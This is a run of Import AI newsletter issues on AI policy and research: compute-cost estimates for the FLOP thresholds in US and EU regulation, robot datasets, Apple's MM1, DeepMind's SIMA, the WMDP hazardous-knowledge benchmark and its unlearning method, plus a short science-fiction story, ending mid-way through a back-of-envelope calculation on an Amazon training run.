Import AI

What does 10^25 versus 10^26 mean?

A brief look at what FLOPs-based regulation nets out to 

Recent AI regulations have defined the trigger points for oversight in terms of the amount of floating point operations dumped into training an AI system. If you’re in America and you’ve trained a model with 10^26 FLOPs, you’re going to spend a lot of time dealing with government agencies. If you’re in Europe and you’ve trained a model with 10^25 FLOPs, you’re going to spend a lot of time dealing with government agencies.

More details:

In the United States, the recent Biden Executive Order on AI says that general-purpose systems trained with 10^26 FLOPs (or ones predominantly trained on biological sequence data and using a quantity of computing power greater than 10^23) fall under a new reporting requirement that means companies will let the US government know about these systems and also show their work on testing these systems.

In Europe, the recent EU AI Act says that general-purpose systems trained with 10^25 FLOPs have the potential for “systemic risk” and that people who develop these models “are therefore mandated to assess and mitigate risks, report serious incidents, conduct state-of-the-art tests and model evaluations, ensure cybersecurity and provide information on the energy consumption of their models.”

Given how difficult the task of assessing AI systems is, these thresholds matter – governments will need to staff up with people who can interpret the results for models that cross them.

What is the difference between 10^25 versus 10^26 FLOPs in terms of money?

Let’s say you wanted to train an AI system – how much money would you spend on the compute for training the system before you hit one of these thresholds? We can work this out:

NVIDIA H100 – NVIDIA’s latest GPU.

Assumptions:
Using FP8 precision – various frontier labs (e.g., Inflection) have trained using FP8
40% efficiency – assuming you’ve worked hard to make your training process efficient. E.g., Google claims ~46% for PaLM 540B
$2 per chip hour – assuming bulk discounts from economies-of-scale.
Training a standard Transformer-based, large generative model.

10^26
Flops per chip second = 2000e12* × 0.4 = 8E14
Flops per chip hour = flops per chip s × 60 (seconds per minute) × 60 (minutes per hour) = 2.88E18
chip h = 1e26 / flops per chip h = 34.722M
chip h × $2 = $69.444M

*3958 TFLOPS (for fp8 with sparsity) on H100 SXM divided by 2 (because the 2x sparsity support generally isn’t relevant for training), so the right number is 1979e12. But the datasheet doesn’t have enough information to tell you that; you just have to know!

10^25
Flops per chip second = 2000e12 × 0.4 = 8E14
Flops per chip hour = flops per chip s × 60 (seconds per minute) × 60 (minutes per hour) = 2.88E18
chip h = 1e25 / flops per chip h = 3.47M
chip h × $2 = $6.94M

NVIDIA A100 – NVIDIA’s prior generation GPU, which lots of labs have lots of.

Assumptions:
Using BF16 precision (A100s don’t have FP8 support, so you’d probably use BF16)
60% efficiency (Anecdata)
$0.80 per chip hour

A100-hrs = 1e26 / (312e12 * 0.6 * 3600) = 1.5e8
Cost = A100-hrs * 0.8 = $119M

What this means in practice:

Anyone who works in AI knows that a training run probably doesn’t work perfectly, so we should multiply these numbers by 1.5 to factor in some bugs, cluster problems, general screwups, and so on. This means we can arrive at these numbers:

10^25 = $6.94m * 1.5 = $10.4m
10^26 = $69.444M * 1.5 = $104m
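If you want to rerun this napkin math yourself, here it is as a small Python sketch. It uses the same assumptions as above (peak chip throughput, guessed efficiency, guessed price per chip-hour, and the 1.5x overhead factor applied to the H100 numbers); change any of these and the answer moves accordingly.

```python
# Napkin math for the cost of hitting the 10^25 / 10^26 FLOP thresholds.
# All inputs are the assumptions stated above, not measured figures.

def training_cost_usd(target_flops, peak_flops_per_s, efficiency,
                      usd_per_chip_hour, overhead=1.0):
    """Rough cost to accumulate `target_flops` of training compute."""
    flops_per_chip_hour = peak_flops_per_s * efficiency * 3600
    chip_hours = target_flops / flops_per_chip_hour
    return chip_hours * usd_per_chip_hour * overhead

# H100 at FP8: ~2e15 dense FLOP/s peak, 40% efficiency, $2/chip-hour,
# plus the 1.5x factor for bugs and cluster problems.
for threshold in (1e25, 1e26):
    cost = training_cost_usd(threshold, 2e15, 0.4, 2.0, overhead=1.5)
    print(f"H100, {threshold:.0e} FLOPs: ${cost / 1e6:.1f}M")   # ~$10.4M and ~$104.2M

# A100 at BF16: 312e12 FLOP/s peak, 60% efficiency, $0.80/chip-hour (no overhead factor).
print(f"A100, 1e26 FLOPs: ${training_cost_usd(1e26, 312e12, 0.6, 0.8) / 1e6:.0f}M")  # ~$119M
```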

Some thoughts on thresholds and the difficulty of regulatory scope and testing:

Both the US and EU regulatory regimes are oriented around the notion that systems which fall above their respective compute thresholds need to go through some intensive testing. In the US, there are very few companies that have likely spent $100m on a single big training run, though there will probably be some. By comparison, there are many companies that have spent more than $10m on a training run – including European ones like Mistral whose recent Mistral-Large model (I’m guessing) likely came in at above this.

Therefore, 10^25 as a threshold seems like it probably hits more companies than regulators anticipate – my prediction is that the EU will end up needing to regulate far more companies/AI systems than it anticipated it’d need to when it drafted the law.

Import AI 366: 500bn text tokens; Facebook vs Princeton; why small government types hate the Biden EO

Import AI publishes first on Substack – subscribe here.

DROID – another huge robot dataset drops:
…More and more data means more and more invention…
A consortium of researchers have released the Distributed Robot Interaction Dataset (DROID), a giant dataset of an industrial robot carrying out various tasks in various settings. Datasets like DROID are meant to help researchers train large AI systems to better understand and control robots in open-ended settings like homes and offices. 

DROID ingredients: The dataset consists of 76k trajectories across 350 hours of interaction data, collected across 564 scenes, 86 tasks, and 52 buildings. DROID was collected by 18 research labs in North America, Asia, and Europe over the course of a year. All data is collected on the same robot hardware stack based on the Franka “Panda” robot arm. Collection locations include: industrial office, home kitchen, office, living room, hallway, closet, bedroom, laundry room, and more.
    Some of the tasks the robots are recorded doing include manipulating kitchen items like waffle makers, placing apples in pots, toasting things, cleaning up desks, and more.

The full data collection setup: “A Franka Panda 7DoF robot arm, two adjustable Zed 2 stereo cameras, a wrist-mounted Zed Mini stereo camera, and an Oculus Quest 2 headset with controllers for teleoperation. Everything is mounted on a portable, height-adjustable desk for quick scene changes,” they write. The resulting data from the episodes consists of “three synchronized RGB camera streams, camera calibration, depth information, and natural language instructions”.

Diverse data makes for better robots: In tests, the authors find that training some diffusion models with “DROID boosts policy performance, robustness and generalizability by 20% on average over state-of-the-art approaches that leverage existing large-scale robot manipulation datasets”. They figure this out by comparing training on DROID to just training on task-specific data, and training on a mix of task-specific data and data from another dataset (the Open X-Embodiment dataset). 
   Additionally, they find that “using the split of the dataset with more diverse scenes yields better performance in the OOD evaluation setting” – this makes intuitive sense as the further off distribution you go the more you tend to fail, so using the most unusual parts of a dataset like DROID is likely to help with weird circumstances. 

Why this matters – the evidence is mounting up of data-scaling for robotics: DROID complements other major released datasets like the Open X-Embodiment dataset as well as proprietary ones like Google’s RT-1. These datasets are all very large in scope and accompany attempts to train large-scale neural nets on the resulting datasets. In general, robotics is showing the same signs as computer vision was showing in the early 2010s – a sudden arrival of a few large-scale datasets complemented by the application (and scaling up) of relatively simple neural methods. I expect robots are going to get dramatically better counterintuitively quickly.
   Read the research paper: DROID: A Large-Scale In-The-Wild Robot Manipulation Dataset (arXiv).
   Find out more at the project website: DROID: A Large-Scale In-the-Wild Robot Manipulation Dataset (Droid Dataset website).

***

What do conservatives think about the White House’s executive order on AI? They don’t love it!
…House oversight hearing highlights criticism of the EO…
Last year, the Biden administration released a broad, sweeping Executive Order on AI. The EO tasks agencies across the government with carrying out studies and reports about AI as well as changing how they buy it. It also takes the unusual step of seeking to gather significant amounts of information about companies planning to train AI systems that use more than 10^26 FLOPs. 
    In policy, for every action there is an equal and opposite reaction – so now that we’re a few months beyond it, various White House detractors have started to flesh out their criticism of the EO. To that end, the House Oversight Committee held a hearing on “White House Overreach on AI” last week. Witnesses came from the Cato Institute, R Street Institute, The Abundance Institute, and the Brookings Institution. 

Main criticisms of the EO: 

  • Three of the four witnesses (exception: Brookings) specifically criticized the EO’s use of the Defense Production Act as an example of overreach – taking a law meant to guarantee wartime production of stuff and turning it into a reporting requirement for big training runs.
  • Three of the four witnesses (exception: Brookings) took issue with the risk-motivated nature of the EO, noting that typically the US government has taken a more pro-innovation approach with new technologies. 
  • Three of the four witnesses (exception: Brookings) raised the alarm that the EO sees the US carrying out expansive regulation of the kind that is meant to be the job of Congress.
  • One witness (R Street) said the EO looks pretty different to how the US government approached internet technologies in the 1990s, where back then “we allowed new digital technologies to be “born free” and to flourish without excessive micromanagement, and then used ongoing multistakeholder efforts and flexible regulatory responses to address concerns”.

Why this matters – even though everyone knows US policy is dysfunctional, they hate people doing something about it! The amusing and freaky thing about the criticisms is they note something true (the EO is making policy, and Congress is meant to be doing that), but they fail to note a truth that everyone knows – US policy is currently going through a dysfunctional period where passing anything of substance is a titanic battle (and mostly defined by failures). 
    Therefore, a lot of the real debate underlying this hearing is basically “is doing something better than doing nothing?”. People who spend a lot of time working with AI systems and staring at scaling laws tend to arrive at the point of view that there’s merit to doing “something”, but if you treat AI as a regular technology, you typically end up concluding that there’s no need to do anything special about it. 
   The problem is, of course, that readers of this newsletter know something is happening with AI – everywhere in this newsletter I cover exponentials – exponential growths in model complexity, in data used to train the models, in money dumped into training them. And I cover the results of exponentials – surprising and deeply powerful capabilities appearing slowly then suddenly then everywhere at once. Clearly, the world of AI is changing at a breakneck pace, but how you justify that to people who don’t spend all their time knee-deep in arXiv is another matter – and as this hearing illustrates, those justifications aren’t seen as particularly trustworthy… at least not yet.
    Watch the hearing and read the statements here: White House Overreach on AI (House Oversight website).

***

Want 500 billion tokens of public domain text? Use Common Corpus
…However, this still falls below what is needed to train frontier AI systems…
Researchers with Pleias have released Common Corpus, “the largest public domain dataset released for training LLMs.” The dataset consists of ~500 billion words “from a wide diversity of cultural heritage initiatives.” This includes a collection of 21 million digitized newspapers, along with tens of billions of words from French, German, Spanish, Dutch and Italian sources, as well as more data in other “low resource languages”.

Why this matters – scale and the difficulties thereof: At 500 billion words, this corpus weighs in at somewhere between 600 and 700 billion tokens. By comparison, small open source models like LLaMa2 were trained on 2 trillion tokens, and larger scale proprietary models are trained on multiples of that. That means that while Common Corpus is a laudable effort, it doesn’t yet have the scale necessary to let people train language models on it alone.
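The words-to-tokens conversion above assumes roughly 1.2 to 1.4 tokens per word, a typical ratio for BPE-style tokenizers on European languages – a trivial sketch:

```python
# Rough words -> tokens conversion; the 1.2-1.4 tokens/word ratio is an
# assumption (typical for BPE-style tokenizers), not a figure from the release.
words = 500e9
for tokens_per_word in (1.2, 1.4):
    print(f"{words * tokens_per_word / 1e9:.0f}B tokens")   # 600B, 700B
```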
   Read more: Releasing Common Corpus: the largest public domain dataset for training LLMs (HuggingFace blog).
   Get the data here (Common Corpus, HuggingFace).

***

What Facebook’s versus Princeton’s GPUs tell us:
…300 + 350,000 = the decline of democracy…
This week, Princeton announced that it was preparing to fire up a cluster of 300 NVIDIA H100 GPUs. In a press release, the university said the cluster “arrives at a crucial time in AI research, when industry’s massive computing resources have mostly driven the direction of AI discourse. The multimillion-dollar investment was primarily funded by the University endowment.”
    If we assume an H100 costs about $30,000 (with some discounts), then we can napkin out Princeton’s capital outlay here as about $9 million. 
    By comparison, Facebook said earlier this year it would have 350,000 H100 GPUs by the end of the year – that represents an outlay of about $10 billion (assuming some discounts). 
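If you want to check the napkin math yourself, here it is as a tiny sketch; the ~$30,000-per-H100 figure is the assumption stated above, not a disclosed price.

```python
# Napkin comparison of capital outlay, assuming ~$30,000 per H100 after discounts.
usd_per_h100 = 30_000                 # assumption, not a disclosed price
princeton = 300 * usd_per_h100        # ~$9 million
facebook = 350_000 * usd_per_h100     # ~$10.5 billion
print(f"Princeton: ${princeton / 1e6:.0f}M, Facebook: ${facebook / 1e9:.1f}B, "
      f"ratio: {facebook / princeton:.0f}x")   # ~1167x
```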

Why this matters – democracy is a choice made through funding: At a time when training frontier models takes 10,000+ GPUs (see: ByteDance’s recent paper, #363), Princeton’s cluster commits the university to doing tiny training runs far behind the commercial frontier – and that’s assuming it is able to devote the entire cluster to a run, which it mostly won’t be able to. This highlights how as companies are increasing their spending on the raw capital required to train AI systems, universities are being left far behind the frontier. Ultimately, this reduces the level of democratic inputs into the frontier of the technology. 
    (A reasonable counterargument to this is whether that’s a bad thing – universities don’t operate their own oil refineries or car factories either, and that seems fine. But my sense is that there’s a lot of experimental insights you can only derive from training models at the frontier, and we’re definitely losing out on that). 
    Read more: Princeton invests in new 300-GPU cluster for academic AI research (AI at Princeton blog).

***

Apple publishes a cookbook for multimodal models:
…MM1 is a good family of multimodal models – the notable thing is how detailed Apple is being in disclosing them…
Apple has published details on MM1, a family of text-image models which get best-in-class performance. The notable thing here is that Apple, a company usually known for its intense secrecy, is being very open about its approach to AI research – as it says in the paper, the purpose here is to outline multimodal large language models (MLLMs) and to “document the MLLM building process and attempt to formulate design lessons, that we hope are of use to the community”.

Model types: “We scale up our model by using larger LLMs, from 3B, 7B, to 30B, and by exploring mixture-of-experts (MoE) models, from 3B MoE with 64 experts, to 7B MoE with 32 experts,” Apple writes. “This leads to a family of performant models, that outperforms most of the relevant works to the best of our knowledge.”
    How good are they? “MM1 outperforms all published prior work for pre-trained MLLMs”, Apple says – though it’s benchmarking the models against roughly equivalently sized models for which research papers are available and does not benchmark against proprietary models. Therefore, while the MM1 models are definitely quite good, they’re unlikely to be the best-in-class.

Data: The models were trained on the following datasets:

  • Captioned images: CC3M, CC12M, HQIPT-204M, COYO, Web Image-Text-1B (Internal)
  • Captioned Images (Synthetic): VeCap
  • Interleaved Image-Text: OBELICS, Web Interleaved (Internal)
  • Text-only: Webpages, Code, Social media, Books, Encyclopedic, Math

Key lessons: “On the modeling side, we see that design aspects are in the following order of importance: image resolution, visual encoder loss and capacity, and visual encoder pre-training data,” Apple writes. When it comes to data, “interleaved data is instrumental for few-shot and text only performance, while captioning data lifts zero-shot performance.”

Why this matters – unusual openness from a tech giant: The fact Apple is publishing about this tells us a bunch of broader things about the AI space: publishing stuff is usually a tactic for a) showing competence and b) generating career capital for researchers, so the fact Apple is doing this suggests it wants to hire more people in this area and retain the ones it has. Additionally, the attention paid to relatively small models feels interesting – given Apple’s huge emphasis on consumer privacy and data protection it seems likely the company ultimately wants to do on-device AI (whether phones or MacBooks) and crucial to that will be building high-performing models that can be fit onto Apple silicon, like some of the smaller ones described here. Finally, the existence of the internal datasets tells us Apple is building out the enabling infrastructure for larger ML efforts, like internal data labeling systems.
   Read more: MM1: Methods, Analysis & Insights from Multimodal LLM Pre-training (arXiv).

Tech Tales:

A Good Natured Eschaton
[Eastern United States, five years into the singularity]

Be careful that dog has elk shit on it! They said
Now you tell me, I said, looking at the dog as it nuzzled into me. I pushed it away and it sat down good naturedly at my feet and licked its paws. Some people laughed.
Me and the other humans and the dog all looked at the fire together
What do you think is happening out there? I said
I don’t know, said an old timer who’d been there for a while. The same thing but faster. 
Yeah, said someone else. I’m guessing that things feel pretty confusing right now. 
I bet, I said. That’s why I’m here. 
And then me and the humans and the dog looked at the flames and some of us turned our faces to the sky and watched the sparks fly upward. Then overhead a river of light appeared from some of the structures being built way up there in space. And then it was gone. 

Before I wanted to come to the zone there were reports the ribbon would take a couple of decades to build. But there was also talk they’d get it done sooner as the machines had some bright ideas. The time it’d take kept on shrinking. By the time I decided I was heading here, reports said ten years max.


The next day was the same as the day before. Gardening. Walking. Repairing various things from the ravages of time. Light speculation about the world outside, but not too much. And then dinner. And then – for some of us – time around a fire to sit and talk and speculate. Sometimes we went to the border of the exclusion zone and we sold things – woven baskets, carved wood. The stranger the world out there got, the more people seemed to enjoy the things we made – they’d take photos of whatever we sold and post them. Sometimes they or their droids would ask us if we gave them permission to film us – and we usually said yes.

People were coming in all the time. They all had their stories:
    Oh it’s just all so fast. One day I got me a hairdryer and it landed on my backyard like fifteen minutes after I asked for it. Can you believe that, 15? 
    They said it didn’t matter that I was a teacher, I couldn’t be as good as the machine. 
    I enjoyed it all at first and I made a lot of money. But I just couldn’t find meaning in it. I don’t have kids or anything so after a while I just thought – why not?
    Everyone used to get so mad at me for not having a phone but I thought they were crazy. I came here because it’s peaceful.
   I guess I’m different – I love technology. But one day I woke up and I had these headaches and eventually I figured out they went away if I didn’t have a phone near me. Then of course one day I read about this place and I came to visit and all my pain disappeared. I tried to go back but I just thought why am I living like this. So that’s why I’m here. Maybe they’ll invent something to let me get back out there!

Sometimes at night, from the edge of the exclusion zone, you could see the sky: there’d be these multi-colored drone shows and because we were so far away it was like a blush in the distance – these shapes in the sky and their colors. We had some binoculars and we’d pass them around. As the technology advanced the lights got brighter and the drones got stranger. One day we all got a scare because instead of being rotored drones they were spheres hovering and sometimes turning translucent and other times radiating with all kinds of colors. I guess the machines figured out some interesting tech. We’d try to tell stories about what the light shows could mean – sometimes they were brighter and sometimes less bright, but we couldn’t figure it out. 
    Those are M2M, said a droid at the border when we were buying fuel. 
    M2M? I said. 
    Machine to machine, it said. It’s something we do for each other. It’s not really easy to understand for humans. 
   What does it mean? I said. 
   The machine held out both its arms and hands; an imitation of a shrug. It’s like internet memes, it said. It’s hard to explain unless you spend all your time there. Does that make sense?
    It does, I said.
    What’s a meme, an oldtimer who was with me said. 
    Let’s not get into that, said the machine and I in unison. Then I laughed and the machine just looked at both of us and hummed.

They started calling the economy the Meconomy – the machine economy. That’s what one of the droids told us one day.

Months and years passed. We kept selling our goods but they didn’t ask to film them as much, though we didn’t know if they were just doing it in secret. The lights in the sky got stranger then one day they stopped happening. The supplies still came though and when we asked a droid what happened to the lights the droid said the M2M stuff now happened in wavelengths humans couldn’t see.
    There were tens of thousands of people in the exclusion zone, by that point. All voluntary. We even heard at the border one day that there was talk in Washington of expanding it. 
   Won’t that cost a lot? I said. 
   You’d be surprised, said the droid, as it unloaded fuel from the gleaming AI-truck and onto our wooden wagon. There’s a joke that maybe the last thing to truly be resistant to all this AI stuff is politics, but even that’s changing.

Some of us took up hunting. We could get meat at the border but there were so many animals it seemed like a thing to do. Something about rewilding of land. 

They’ve got these towers in the cities now, said one new arrival. They go up and they’ve got farms and parks and when you want to go to another tower an air bridge appears. 
   Like it folds out of the building? I asked.
   No, that’s the crazy thing, they said. It’s a flying bridge – you ask to go and it flies over and it’s like a tube and the building opens and you walk through it. 
    Cool, I said. 
    Not for me, they said. That was when I felt like I’d hit my limit. Reminded me of when I was a kid and I had pet hamsters. Not for me, I said. So that’s why I came here. 
   Damn right, said the oldtimer, and spat into the fire. We humans build stuff to last.

We knew things had changed for good when they stopped taking our money. 
   No payment needed, said the robot one day as we went to try and pay it for the supplies. 
    What do you mean? I said. 
    Consider it a donation, said the machine. 
    That caused a bit of commotion. People seemed confused. A couple of the old timers didn’t like it. Donations ain’t free, whispered one of them. I sensed tension among us humans for the first time in months. So I stepped forward and spoke to the machine: I’d like to speak to a person about this, I said. 
    Of course, said the machine. If you can wait, someone will be here in an hour. 
    I’ll wait, I said. 
    I told everyone else to get out of there. Even if it takes two hours I can get back before dark, I’ll be fine, I said. While I waited the machine just stood there. I suppose it was thinking. 

 I was patching a hole in my shirt when the person arrived on a flier. The thing was so quiet I didn’t notice until the shadow fell over me. It had a multitude of tiny fans on it and they were all silent and the fins were thin – thinner than anything I’d seen before. 
    A door in its side slid open and a person stepped out. They had a shirt and pants and shoes on and a single earbud. 
    Howdy, they said. 
    Hello, I said. Why don’t we need to pay? The machine said it was a donation. 
    You don’t need to pay, they said. It’s all so cheap these days there’s no need. 
    Cheap isn’t free. 
    You’re right, it isn’t. 
    So why don’t we have to pay?
    Ah, the person said, and looked down. I suppose you wouldn’t know… the exchange rates system changed recently and we don’t take this currency anymore. 
    You don’t take the US dollar? I said. 
    Oh, we do, they said. But there’s a new dollar. It works differently. We can’t really exchange it for what you have without some complication. It’s all digital. The financial system works a lot differently. And really, it’s so cheap you don’t need to worry. 
    It’s a pride thing, I said. Can you help us out?
    I’ll see what I can do. 
    I’m sure you can figure it out, I said. And along with that, can you keep paying us as well? 
    The person looked at me for a while. Of course, they said. Of course we can.

When I got back to camp they asked me what happened. Some people seemed upset. 
   I never been a charity case, said one of them. 
    It’s ok, I said. It was just a bug. I spoke to someone and we straightened it out. I guess even these machines mess up sometimes!
    A bunch of people smiled at that. Good thing we had the sense to check, said the old timer. The human sense. 
    And everyone seemed pretty calm. The world kept taking our money and paying us for whatever we traded from the zone. I suppose word got around pretty quickly out there. We haven’t had trouble since. 

Things that inspired this story: What technological abundance might feel like; thinking about the Radio Exclusion Zone as a template or prototype for a kind of peaceful dissent from technology; how real wealth might manifest in the lived and experienced world; fast and slow takeoffs; the nature of machines amusing other machines; a dog covered in elk shit jumping onto a friend of mine at the bar where I play pool and me reflecting that people have been drinking and laughing about dogs covered in shit and playing games with sticks and spheres for thousands of years – perhaps the only thing different about our situation was we had electric lights and some music from a machine, and the whole situation of us and the dogs and the pool table and the alcohol would make total sense to people transported in from millennia ago.

Thanks for reading!

Import AI 365: WMD benchmark; Amazon sees $1bn training runs; DeepMind gets closer to its game-playing dream

Import AI publishes first on Substack – subscribe here.

Anti-doomer DC nonprofit launches:
…The counterreaction to overreach on safety…
Some technologists have launched Alliance for the Future (AFTF), a DC-based nonprofit organization meant to fight what it sees as regulatory capture and overreach by AI safety advocates. “AFTF works to inform the media, lawmakers, and other interested parties about the incredible benefits AI can bring to humanity. We will oppose stagnation and advocate for the benefits of technological progress in the political arena,” the group writes in a statement. “Escalating panic and reckless regulation around artificial intelligence will cause more harm than benefit. AFTF was founded to be the voice of ordinary users, builders, and founders, who want the basic freedom to use machine learning in their day to day lives.”

Why this matters – every action in policy creates a counterreaction: AFTF exists because a load of people affiliated with the AI safety community have lobbied in DC for ideas like needing licenses to develop AI systems, and other ideas that have generally been perceived as overreach. In response, organizations like AFTF form. It’s worth remembering that well-intentioned policy is still a thing that exists in politics – and in politics forces always generate counter-forces. 
Find out more: Alliance for the Future (official website).

***

Foundation models come for industrial robots:
…RFM-1 shows how generative AI can be applied to industrial robots…
Covariant, an AI company that builds systems to help industrial robots pick up and place objects, has published details on RFM-1, a robotic foundation model. RFM-1 is “an 8 billion parameter transformer trained on text, images, videos, robot actions, and a range of numerical sensor readings” and is meant to make operating industrial robots as easy as prompting language models to generate text. 

What RFM was trained on: Covariant robots are deployed in a bunch of warehouses around the world, so some of the secret sauce of RFM is a proprietary dataset. “Our systems have been manipulating deformable objects, handling high occlusions, reasoning about the varying suction dynamics across materials, dealing with the chaos of irregularly shaped items in motion, and handling a wide array of objects varying from makeup and clothes to groceries and mechanical parts,” Covariant writes. The robots also see “long-tail events like items infinitely rolling on a conveyor belt or unexpectedly breaking up [which] help give RFM-1 a more robust understanding of the physical world”.

Prompting robots like language models: RFM ultimately means people can interface with robots differently – they can instruct robots to do tasks in plain English, and robots can also articulate to people when they’ve run into problems and what is causing them. 

Caveat – Not yet deployed: RFM-1 is a prototype and not widely deployed. “Despite promising offline results of testing on real production data, RFM-1 has not yet been deployed to customers,” Covariant writes. “RFM-1 as a world model currently operates at a relatively low resolution (~512×512 pixels) and frame rate (~5 fps). Although the model can already start to capture large object deformations, it cannot model small objects / rapid motions very well.”

Why this matters – big changes happen slowly then all at once: RFM-1 is a sign that robotics, a field mostly distinguished by being slow-moving and terrifically expensive, is about to start to move at the speed of software-oriented AI; systems like RFM-1 mean we can instrument existing industrial robots with data collectors and cameras and control systems like foundation models, then rapidly gather experience and unlock new capabilities. 
  Read more: Introducing RFM-1: Giving robots human-like reasoning capabilities (Covariant, blog).

***

DeepMind gets closer to its dream of a general AI agent:
…SIMA fuses recent AI advances together to achieve a longstanding dream…
DeepMind started out life by training agents to play Atari games like Pong from pixels alone – research that back in the ancient days of ~2013 was jaw-dropping to most people in the AI community. They followed this up with work like AlphaGo and AlphaStar (Starcraft). But then a funny thing happened – large language models. Attention in the AI research world moved on from RL to training big generative models on text, images, video, and more. 

   Now, things have come full circle, as DeepMind has taken some of the results from these advances and used them to make what it calls a Scalable Instructable Multiworld Agent (SIMA) – an RL agent that has learned to carry out ~600 distinct actions in a bunch of different simulated worlds.  “SIMA is an AI agent that can perceive and understand a variety of environments, then take actions to achieve an instructed goal,” DeepMind writes. “Our AI agent doesn’t need access to a game’s source code, nor bespoke APIs. It requires just two inputs: the images on screen, and simple, natural-language instructions provided by the user. SIMA uses keyboard and mouse outputs to control the games’ central character to carry out these instructions”.

How SIMA works: SIMA relies on a dataset made of demonstrations of the games being played as well as – and this is crucial – written instructions. This data takes the form of players being instructed by other players in what to do, and also players narrating their own actions. This dataset (which spans 6 popular games including No Man’s Sky and Goat Simulator, as well as 4 research environments) is fed into an agent which uses an image encoder (SPARC) and video encoder (Phenaki) as well as a text encoder to take this data and feed it into – you guessed it! – a transformer, which learns to map it to keyboard and mouse outputs. 

 The result is an RL agent that also inherits some of the benefits of the recent few years of the AI revolution – pretrained models like SPARC and Phenaki. “Combining these pre-trained models with fine-tuning and from-scratch training allows the agent to utilize internet-scale pretraining while still specializing to particular aspects of the environments and the control tasks that it encounters,” DeepMind writes.
   This leads to a powerful agent with surprisingly strong generalization: “In our evaluations, SIMA agents trained on a set of nine 3D games from our portfolio significantly outperformed all specialized agents trained solely on each individual one,” DeepMind writes. “Even when tested in an environment on which it has not been trained to act the agent demonstrates strong performance on general tasks”.

One important caveat: All the skills learned here take less than ten seconds to complete, so we’re some ways away from a complex multi-step instruction following agent.

Why this matters – digital imaginations are real: This works because the agent is able to develop some general conceptual representation of the tasks it is being asked to do and apply that representation to diverse and sometimes unseen environments. This means DeepMind has figured out how to learn to connect diverse environments with diverse instructions via intermediate representations that are naturally easy to be applied to new situations. This kind of thing says that if you keep scaling this up and have the data and compute it’s just going to keep working – the key question now is a) how far can this extend before the ‘s curve’ it’s on bends, and b) how complex can the environments become.
   Read more: A generalist AI agent for 3D virtual environments (Google DeepMind blog).
   Read the research: Scaling Instructable Agents Across Many Simulated Worlds (Google DeepMind, PDF).

***

Could your model enable terrorists? Check with WMDP:
…A test to discern competency at causing catastrophe – and techniques for ‘unlearning’ this…
A diverse group of researchers have teamed up to build the Weapons of Mass Destruction Proxy Benchmark (WMDP). This benchmark consists of “4,157 multiple-choice questions that serve as a proxy measurement of hazardous knowledge in biosecurity, cybersecurity, and chemical security”. The idea is that AI developers can use this benchmark to figure out if their AI models know potentially dangerous knowledge. 

How the benchmark was constructed: Building WMDP cost more than $200k. “Our questions are written by academics and technical consultants in biosecurity, cybersecurity, and chemistry,” the researchers write. “We first generate threat models for each of these areas and then use the models to inform questions that an adversary might encounter when developing attack capabilities. To ensure quality, all of our questions were checked by at least two experts from different organizations“. 
   Within biosecurity, the benchmark focuses on “the development and dissemination of transmissible potential pandemic agents, such as influenza, smallpox, etc”; within cybersecurity it covers “reconnaissance, weaponization, exploitation, and post-exploitation”; and within chemistry it tries to look at “(a) procuring the source materials; (b) synthesizing the target chemical weapons and/or explosives; (c) purifying and validating the synthesized compounds; (d) surreptitiously transporting the weapons to the desired location; and (e) deploying the weapons in an effective manner”.

“Unlearning” capabilities: Alongside WMDP, the authors also outline a technique for selectively “unlearning” dangerous knowledge. Though well-intentioned, this technique seems like it could be prone to abuse (governments asking AI developers to unlearn a broad range of things). 
The technique, which they call “Contrastive Unlearn Tuning” (CUT), has the goal of reducing, for example, “the model’s ability to answer queries about hazardous knowledge (e.g., synthesizing anthrax) while maintaining the model’s ability to answer queries about non-hazardous knowledge (e.g., culturing yeast). We operationalize this as reducing a model’s QA accuracy on WMDP while maintaining performance on general capabilities benchmarks, such as MMLU and MT-Bench.” The purpose of CUT is to “bend the model representations on hazardous knowledge towards those of a novice. We must precisely specify both the distribution of knowledge to unlearn and the direction to push the activations towards”. 
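As a rough illustration (and emphatically not the paper’s implementation), the representation-steering idea reads something like the sketch below: push the model’s activations on hazardous text toward an arbitrary control vector, while anchoring its activations on benign text to those of the frozen original model. The get_hidden helper, the layer choice, and the hyperparameters are all my own assumptions.

```python
import torch
import torch.nn.functional as F

def get_hidden(model, batch, layer):
    # Hidden states at a given transformer layer, shape [B, T, D]; assumes a
    # HuggingFace-style model that accepts output_hidden_states=True and a
    # `batch` dict of input_ids / attention_mask.
    out = model(**batch, output_hidden_states=True)
    return out.hidden_states[layer]

def unlearning_loss(model, frozen_model, forget_batch, retain_batch,
                    layer, control_vec, alpha=100.0):
    """One step of a CUT-style unlearning objective (simplified sketch).

    - On hazardous ("forget") text, push hidden states at `layer` toward a
      fixed control vector, degrading that knowledge.
    - On benign ("retain") text, keep hidden states close to the frozen
      original model, preserving general capability.
    """
    h_forget = get_hidden(model, forget_batch, layer)
    forget_loss = F.mse_loss(h_forget, control_vec.expand_as(h_forget))

    h_retain = get_hidden(model, retain_batch, layer)
    with torch.no_grad():
        h_retain_ref = get_hidden(frozen_model, retain_batch, layer)
    retain_loss = F.mse_loss(h_retain, h_retain_ref)

    return forget_loss + alpha * retain_loss
```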
CUT kind of works – they’re able to reduce performance on some WMDP evals while broadly maintaining performance on other evals, but it still has costs – performance on the other evals degrades, albeit slightly. But sometimes the hardest and most useful knowledge to gain is in the last few percent of a certain eval, so though the superficial effect could be small, the qualitative effect could wind up being massive. 

Why this matters – what is risk and how do we know about it? The whole AI community is currently wrapped up in a confusing conversation about AI safety / AI risk / misuse / accidents / etc. Benchmarks like WMDP can bring some sense to that discussion by giving us a way to test out AI systems for competency at different skills which may have a credible security component. It’ll be fascinating to see how models score on things like WMDP in the coming months. 
  Find out more: The WMDP Benchmark: Measuring and Reducing Malicious Use With Unlearning (WMDP site).
   Read a blog about the benchmark (Center for AI Safety).
   Get the benchmark data (WMDP, GitHub).
   Read the paper: The WMDP Benchmark: Measuring and Reducing Malicious Use With Unlearning (arXiv).

***

Amazon can see $1 billion training runs on the horizon:
…Technical talk from a longtime AWS person sheds light on frontier AI training…
James Hamilton, a distinguished engineer at Amazon, said at a talk this year that within the last year Amazon carried out a $65m training run. Specifically, they trained a 200B dense model on 4T tokens of data across 13,760 NVIDIA A100 chips (using 1,720 P4d nodes). It took 48 days to train. Hamilton described this training run as “1 gen old” so we can assume Amazon has moved on to larger runs since then. Looking ahead, Hamilton said “training runs soon to cross $1b”. 
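A quick back-of-envelope check on those figures, using the standard 6 * parameters * tokens approximation for training FLOPs; the derived utilization and per-chip-hour price are my own estimates, not numbers from the talk.

```python
# Back-of-envelope consistency check on the disclosed numbers; the 6*N*D FLOP
# approximation and the derived MFU / $ per chip-hour are estimates.
params, tokens = 200e9, 4e12
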